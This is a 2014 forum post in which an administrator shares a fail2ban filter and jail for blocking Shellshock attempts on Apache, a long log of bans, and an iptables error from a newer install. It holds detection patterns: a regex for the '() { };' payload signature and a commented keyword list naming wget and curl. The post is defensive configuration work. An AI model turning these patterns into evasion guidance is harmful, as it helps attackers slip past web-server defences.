charly78 |
10-25-2014 11:31 AM |
errors
I dunno but I seem to be getting some errors
here is my most recent info on the fail2ban filter
# cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]
# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf
[Definition]
#_daemon = apache2
# Option: failregex
# Notes.: regex to match the failures messages of bash in the logfile. The
# host must be matched by a group named "host". The tag "<HOST>" can
# be used for standard IP/hostname matching and is only an alias for
# (?:::f{4,6}:)?(?P<host>\S+)
# Values: TEXT
#
docroot = /var/www/html
#old original method revised 09/27/14
#shellshock = ping|cgi-bin|bash|wget|curl|cat
#failregex = ^<HOST> .*"(GET|POST) .*\/(?:%(shellshock)s).*?"
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+
# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =
# cat /etc/fail2ban/jail.local
Code:
[shellshock]
enabled = true
port = http,https
filter = shellshock
action = mail-whois[name=shellshock, dest=shellshock@mydomain.com]
logpath = /var/log/apache*/access.log
maxretry = 1
bantime = 29900
all seems good and grabs and emails me a whois so I can contact abuse email address.
Code:
cat /var/log/fail2ban.log
2014-10-19 04:48:03,221 fail2ban.server : INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-19 04:48:03,257 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:48:03,283 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/access.log
2014-10-19 04:48:03,597 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:49:44,232 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-19 04:50:01,389 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/access.log
2014-10-19 07:57:12,694 fail2ban.actions: WARNING [shellshock] Ban 5.135.35.32
2014-10-19 10:07:12,730 fail2ban.actions: WARNING [shellshock] Unban 5.135.35.32
2014-10-20 04:49:40,675 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-20 04:49:41,294 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-20 04:49:41,345 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-20 14:16:41,563 fail2ban.actions: WARNING [dovecot-pop3imap] Ban 218.5.76.26
2014-10-20 16:26:42,220 fail2ban.actions: WARNING [dovecot-pop3imap] Unban 218.5.76.26
2014-10-21 03:34:43,863 fail2ban.actions: WARNING [shellshock] Ban 184.106.228.211
2014-10-21 04:49:37,838 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,210 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,400 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,676 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-21 04:49:38,771 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,807 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,212 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,401 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,773 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,809 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,840 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 05:44:43,883 fail2ban.actions: WARNING [shellshock] Unban 184.106.228.211
2014-10-21 12:19:26,815 fail2ban.actions: WARNING [shellshock] Ban 104.192.0.18
2014-10-21 12:25:46,458 fail2ban.actions: WARNING [shellshock] 104.192.0.18 already banned
2014-10-21 14:29:27,793 fail2ban.actions: WARNING [shellshock] Unban 104.192.0.18
2014-10-22 00:14:30,322 fail2ban.jail : INFO Jail 'dovecot-pop3imap' stopped
2014-10-22 00:14:31,117 fail2ban.jail : INFO Jail 'courierauth' stopped
2014-10-22 00:14:32,093 fail2ban.jail : INFO Jail 'postfix' stopped
2014-10-22 00:14:32,816 fail2ban.jail : INFO Jail 'ssh-ddos' stopped
2014-10-22 00:14:33,161 fail2ban.jail : INFO Jail 'apache-multiport' stopped
2014-10-22 00:14:33,567 fail2ban.jail : INFO Jail 'pureftpd' stopped
2014-10-22 00:14:34,456 fail2ban.jail : INFO Jail 'couriersmtp' stopped
2014-10-22 00:14:35,176 fail2ban.jail : INFO Jail 'ssh' stopped
2014-10-22 00:14:35,718 fail2ban.jail : INFO Jail 'apache' stopped
2014-10-22 00:14:36,170 fail2ban.jail : INFO Jail 'sasl' stopped
2014-10-22 00:14:37,179 fail2ban.jail : INFO Jail 'shellshock' stopped
2014-10-22 00:14:37,417 fail2ban.jail : INFO Jail 'proftpd' stopped
2014-10-22 00:14:37,419 fail2ban.server : INFO Exiting Fail2ban
2014-10-22 00:14:37,694 fail2ban.server : INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-22 00:14:37,695 fail2ban.jail : INFO Creating new jail 'dovecot-pop3imap'
2014-10-22 00:14:37,695 fail2ban.jail : INFO Jail 'dovecot-pop3imap' uses poller
2014-10-22 00:14:37,707 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,707 fail2ban.filter : INFO Set maxRetry = 5
2014-10-22 00:14:37,708 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,708 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,712 fail2ban.jail : INFO Creating new jail 'pam-generic'
2014-10-22 00:14:37,712 fail2ban.jail : INFO Jail 'pam-generic' uses poller
2014-10-22 00:14:37,713 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,713 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,714 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,714 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,719 fail2ban.jail : INFO Creating new jail 'ssh-ddos'
2014-10-22 00:14:37,719 fail2ban.jail : INFO Jail 'ssh-ddos' uses poller
2014-10-22 00:14:37,719 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,720 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,720 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,720 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,724 fail2ban.jail : INFO Creating new jail 'apache-multiport'
2014-10-22 00:14:37,724 fail2ban.jail : INFO Jail 'apache-multiport' uses poller
2014-10-22 00:14:37,725 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,725 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,725 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,726 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,729 fail2ban.jail : INFO Creating new jail 'apache-overflows'
2014-10-22 00:14:37,729 fail2ban.jail : INFO Jail 'apache-overflows' uses poller
2014-10-22 00:14:37,730 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,730 fail2ban.filter : INFO Set maxRetry = 2
2014-10-22 00:14:37,731 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,731 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,735 fail2ban.jail : INFO Creating new jail 'couriersmtp'
2014-10-22 00:14:37,735 fail2ban.jail : INFO Jail 'couriersmtp' uses poller
2014-10-22 00:14:37,735 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,736 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,736 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,737 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,740 fail2ban.jail : INFO Creating new jail 'pureftpd'
2014-10-22 00:14:37,740 fail2ban.jail : INFO Jail 'pureftpd' uses poller
2014-10-22 00:14:37,740 fail2ban.filter : INFO Added logfile = /var/log/syslog
2014-10-22 00:14:37,741 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,741 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,742 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,745 fail2ban.jail : INFO Creating new jail 'ssh'
2014-10-22 00:14:37,745 fail2ban.jail : INFO Jail 'ssh' uses poller
2014-10-22 00:14:37,746 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,746 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,746 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,747 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,816 fail2ban.jail : INFO Creating new jail 'postfix'
2014-10-22 00:14:37,816 fail2ban.jail : INFO Jail 'postfix' uses poller
2014-10-22 00:14:37,816 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,817 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,817 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,818 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,821 fail2ban.jail : INFO Creating new jail 'sasl'
2014-10-22 00:14:37,821 fail2ban.jail : INFO Jail 'sasl' uses poller
2014-10-22 00:14:37,821 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,822 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,822 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,823 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,827 fail2ban.jail : INFO Creating new jail 'apache'
2014-10-22 00:14:37,827 fail2ban.jail : INFO Jail 'apache' uses poller
2014-10-22 00:14:37,827 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,828 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,828 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,828 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,831 fail2ban.jail : INFO Creating new jail 'courierauth'
2014-10-22 00:14:37,831 fail2ban.jail : INFO Jail 'courierauth' uses poller
2014-10-22 00:14:37,832 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,832 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,833 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,833 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,836 fail2ban.jail : INFO Creating new jail 'shellshock'
2014-10-22 00:14:37,836 fail2ban.jail : INFO Jail 'shellshock' uses poller
2014-10-22 00:14:37,837 fail2ban.filter : INFO Added logfile = /var/log/apache2/access.log
2014-10-22 00:14:37,837 fail2ban.filter : INFO Set maxRetry = 1
2014-10-22 00:14:37,838 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,839 fail2ban.actions: INFO Set banTime = 20000
2014-10-22 00:14:37,842 fail2ban.jail : INFO Creating new jail 'proftpd'
2014-10-22 00:14:37,842 fail2ban.jail : INFO Jail 'proftpd' uses poller
2014-10-22 00:14:37,843 fail2ban.filter : INFO Set maxRetry = 6
2014-10-22 00:14:37,843 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,843 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,852 fail2ban.jail : INFO Jail 'dovecot-pop3imap' started
2014-10-22 00:14:37,854 fail2ban.jail : INFO Jail 'pam-generic' started
2014-10-22 00:14:37,855 fail2ban.jail : INFO Jail 'ssh-ddos' started
2014-10-22 00:14:37,855 fail2ban.jail : INFO Jail 'apache-multiport' started
2014-10-22 00:14:37,856 fail2ban.jail : INFO Jail 'apache-overflows' started
2014-10-22 00:14:37,857 fail2ban.jail : INFO Jail 'couriersmtp' started
2014-10-22 00:14:37,858 fail2ban.jail : INFO Jail 'pureftpd' started
2014-10-22 00:14:37,858 fail2ban.jail : INFO Jail 'ssh' started
2014-10-22 00:14:37,859 fail2ban.jail : INFO Jail 'postfix' started
2014-10-22 00:14:37,860 fail2ban.jail : INFO Jail 'sasl' started
2014-10-22 00:14:37,860 fail2ban.jail : INFO Jail 'apache' started
2014-10-22 00:14:37,862 fail2ban.jail : INFO Jail 'courierauth' started
2014-10-22 00:14:37,863 fail2ban.jail : INFO Jail 'shellshock' started
2014-10-22 00:14:37,863 fail2ban.jail : INFO Jail 'proftpd' started
2014-10-22 04:49:33,038 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-23 04:49:40,900 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-23 21:36:21,767 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:28,922 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:36,139 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:44,704 fail2ban.actions: WARNING [pureftpd] Ban 60.176.110.32
2014-10-23 21:36:45,336 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 23:46:45,404 fail2ban.actions: WARNING [pureftpd] Unban 60.176.110.32
2014-10-24 04:49:40,119 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,409 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,448 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,519 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,615 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,627 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,656 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,766 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,851 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-24 04:49:41,121 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,411 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,450 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,617 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,768 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 19:02:44,194 fail2ban.actions: WARNING [ssh] Ban 222.186.21.66
2014-10-24 19:02:47,206 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:50,210 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:53,213 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,217 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,518 fail2ban.actions: WARNING [pam-generic] Ban 222.186.21.66
2014-10-24 21:12:44,794 fail2ban.actions: WARNING [ssh] Unban 222.186.21.66
2014-10-24 21:12:58,261 fail2ban.actions: WARNING [pam-generic] Unban 222.186.21.66
2014-10-25 04:49:39,765 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
i go and install on a newer setup
and I get a error
# cat /var/log/fail2ban.log|tail
Code:
2014-10-25 12:30:37,210 fail2ban.filter : INFO Set findtime = 600
2014-10-25 12:30:37,210 fail2ban.actions: INFO Set banTime = 259200
2014-10-25 12:30:37,275 fail2ban.jail : INFO Jail 'ssh' started
2014-10-25 12:30:37,292 fail2ban.jail : INFO Jail 'ssh-ddos' started
2014-10-25 12:30:37,305 fail2ban.jail : INFO Jail 'apache' started
2014-10-25 12:30:37,345 fail2ban.jail : INFO Jail 'shellshock' started
2014-10-25 12:30:37,371 fail2ban.actions.action: ERROR iptables -N fail2ban-shellshock
iptables -A fail2ban-shellshock -j RETURN
iptables -I INPUT -p http --dport http -j fail2ban-shellshock returned 200
2014-10-25 12:30:37,386 fail2ban.jail : INFO Jail 'asterisk-iptables' started
|